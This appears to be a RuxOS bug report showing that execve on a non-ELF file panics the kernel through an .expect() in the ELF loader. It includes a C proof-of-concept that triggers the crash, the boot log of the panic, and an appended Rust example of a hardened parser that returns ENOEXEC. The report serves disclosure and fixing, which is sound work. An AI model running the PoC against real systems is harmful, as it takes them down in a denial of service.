Describe the bug
RuxOS triggers a kernel panic when a user-space application calls the execve system call on a file that is not a valid ELF executable. This occurs because the ELF loader uses .expect() on the result of the parsing function, leading to a system-wide crash instead of returning an error code (like ENOEXEC) to the calling process.
```rust
.expect("parse ELF failed");
```
To Reproduce
1. Compile the program and run.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>

/*
 * PoC for RuxOS ELF parsing vulnerability
 *
 * This program triggers a kernel panic in RuxOS by:
 *   1. Creating a file with invalid ELF content
 *   2. Calling execve() on that file
 *
 * The crash occurs in load_elf.rs:48 when minimal_parse() fails
 * and .expect() panics with "parse ELF failed"
 *
 * This is user-reachable through the execve system call.
 * Any invalid/corrupted ELF file passed to execve will trigger this.
 */
int main() {
    const char *filename = "/tmp/invalid_elf";
    int fd;

    // Create a file with invalid ELF content
    fd = open(filename, O_CREAT | O_WRONLY | O_TRUNC, 0755);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // Write invalid ELF magic bytes (not a valid ELF file)
    // This will cause minimal_parse() to fail and trigger the panic
    char invalid_elf[] = "INVALID_ELF_FILE_CONTENT";
    write(fd, invalid_elf, sizeof(invalid_elf));
    close(fd);

    printf("Attempting to execute invalid ELF file: %s\n", filename);
    printf("This should trigger kernel panic in RuxOS at load_elf.rs:48\n");

    // Call execve with the invalid ELF file
    // This will cause the kernel to try parsing it as ELF and panic
    char *argv[] = {(char *)filename, NULL};
    char *envp[] = {NULL};
    int ret = execve(filename, argv, envp);

    // If we reach here, execve failed
    perror("execve");
    printf("execve failed with errno: %d (ret=%d)\n", errno, ret);

    // Clean up
    unlink(filename);
    return 0;
}
```
2. features.txt

```
alloc
paging
net
multitask
irq
fs
```
Environment
Logs

```
SeaBIOS (version 1.16.3-debian-1.16.3-2)
iPXE (https://ipxe.org) 00:03.0 CA00 PCI2.10 PnP PMM+7EFCAA40+7EF0AA40 CA00
Booting from ROM..
Initialize IDT & GDT...
8888888b. .d88888b. .d8888b.
888 Y88b d88P" "Y88b d88P Y88b
888 888 888 888 Y88b.
888 d88P 888 888 888 888 888 888 "Y888b.
8888888P" 888 888 `Y8bd8P' 888 888 "Y88b.
888 T88b 888 888 X88K 888 888 "888
888 T88b Y88b 888 .d8""8b. Y88b. .d88P Y88b d88P
888 T88b "Y88888 888 888 "Y88888P" "Y8888P"
arch = x86_64
platform = x86_64-qemu-q35
target = x86_64-unknown-none
smp = 1
build_mode = debug
log_level = warn
[ 0.230531 0 axfs_ramfs::dir:68] AlreadyExists sys
Attempting to execute invalid ELF file: /tmp/invalid_elf
This should trigger kernel panic in RuxOS at load_elf.rs:48
[ 0.231722 0:1 ruxruntime::lang_items:14] panicked at api/ruxos_posix_api/src/imp/execve/load_elf.rs:49:14:
parse ELF failed: BadMagic([73, 78, 86, 65])
```
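The following is an added example and is not part of the issue above or of RuxOS's code. It shows the failure mode the report describes (an `.expect()` on the ELF parse result, so any non-ELF bytes passed to execve take the whole kernel down) next to the hardened shape (a minimal ELF64 header check whose every failure is a returned error, mapped to `-ENOEXEC` for the calling process). The names `ElfError`, `Elf64Header`, `parse_elf64_header`, `load_elf_panicking`, `load_elf_checked` and `sample_elf64_header` are hypothetical; the constructed inputs are the PoC's `"INVALID_ELF_FILE_CONTENT"` bytes, whose first four bytes are the `[73, 78, 86, 65]` in the panic message, and a hand-built ELF64 header.

```rust
// Added example (not RuxOS code): a minimal ELF64 header check that reports
// malformed input as an error instead of panicking. All type and function
// names here are hypothetical.

/// Why parsing failed. The BadMagic payload carries the offending bytes,
/// matching the shape of the error in the reported panic message.
#[derive(Debug, PartialEq, Eq)]
pub enum ElfError {
    TooShort(usize),
    BadMagic([u8; 4]),
    NotElf64(u8),
    UnsupportedType(u16),
}

/// The subset of the ELF64 header an exec path needs before trusting the file.
#[derive(Debug, PartialEq, Eq)]
pub struct Elf64Header {
    pub e_type: u16,
    pub e_machine: u16,
    pub e_entry: u64,
    pub e_phoff: u64,
    pub e_phnum: u16,
}

const ELF_MAGIC: [u8; 4] = [0x7f, b'E', b'L', b'F'];
const ELFCLASS64: u8 = 2;
const ET_EXEC: u16 = 2;
const ET_DYN: u16 = 3;
const EM_X86_64: u16 = 62;
const EHDR64_SIZE: usize = 64;
/// Linux errno value execve(2) returns for a file that is not an executable.
pub const ENOEXEC: i32 = 8;

fn le_u16(b: &[u8], off: usize) -> u16 {
    u16::from_le_bytes([b[off], b[off + 1]])
}

fn le_u64(b: &[u8], off: usize) -> u64 {
    let mut a = [0u8; 8];
    a.copy_from_slice(&b[off..off + 8]);
    u64::from_le_bytes(a)
}

/// Validate the fixed-size header. Each check returns Err; every slice index
/// below is guarded by a length check first, so untrusted bytes cannot panic.
pub fn parse_elf64_header(image: &[u8]) -> Result<Elf64Header, ElfError> {
    if image.len() < 4 {
        return Err(ElfError::TooShort(image.len()));
    }
    let mut magic = [0u8; 4];
    magic.copy_from_slice(&image[..4]);
    if magic != ELF_MAGIC {
        return Err(ElfError::BadMagic(magic));
    }
    if image.len() < EHDR64_SIZE {
        return Err(ElfError::TooShort(image.len()));
    }
    if image[4] != ELFCLASS64 {
        return Err(ElfError::NotElf64(image[4]));
    }
    let e_type = le_u16(image, 16);
    if e_type != ET_EXEC && e_type != ET_DYN {
        return Err(ElfError::UnsupportedType(e_type));
    }
    Ok(Elf64Header {
        e_type,
        e_machine: le_u16(image, 18),
        e_entry: le_u64(image, 24),
        e_phoff: le_u64(image, 32),
        e_phnum: le_u16(image, 56),
    })
}

/// The pattern the report describes: a parse failure takes the kernel down.
pub fn load_elf_panicking(image: &[u8]) -> Elf64Header {
    parse_elf64_header(image).expect("parse ELF failed")
}

/// The hardened shape: the failure becomes -ENOEXEC for the calling process.
pub fn load_elf_checked(image: &[u8]) -> Result<Elf64Header, i32> {
    parse_elf64_header(image).map_err(|_| -ENOEXEC)
}

/// Constructed input: the bytes the PoC writes to /tmp/invalid_elf.
pub const POC_BYTES: &[u8] = b"INVALID_ELF_FILE_CONTENT\0";

/// Constructed input: a well-formed ELF64 ET_EXEC x86-64 header with no segments.
pub fn sample_elf64_header() -> Vec<u8> {
    let mut h = vec![0u8; EHDR64_SIZE];
    h[..4].copy_from_slice(&ELF_MAGIC);
    h[4] = ELFCLASS64;
    h[5] = 1; // ELFDATA2LSB
    h[6] = 1; // EV_CURRENT
    h[16..18].copy_from_slice(&ET_EXEC.to_le_bytes());
    h[18..20].copy_from_slice(&EM_X86_64.to_le_bytes());
    h[24..32].copy_from_slice(&0x401000u64.to_le_bytes()); // e_entry
    h[32..40].copy_from_slice(&(EHDR64_SIZE as u64).to_le_bytes()); // e_phoff
    h[52..54].copy_from_slice(&(EHDR64_SIZE as u16).to_le_bytes()); // e_ehsize
    h[54..56].copy_from_slice(&56u16.to_le_bytes()); // e_phentsize
    h
}

fn main() {
    println!("{:?}", parse_elf64_header(POC_BYTES));
    match load_elf_checked(POC_BYTES) {
        Ok(h) => println!("loaded: {:?}", h),
        Err(e) => println!("execve would fail with errno {}", -e),
    }
}
```

The point of the split between `parse_elf64_header` and `load_elf_checked` is that the parser's error type stays descriptive for logging while the process only ever sees an errno; neither path can unwind inside the syscall handler.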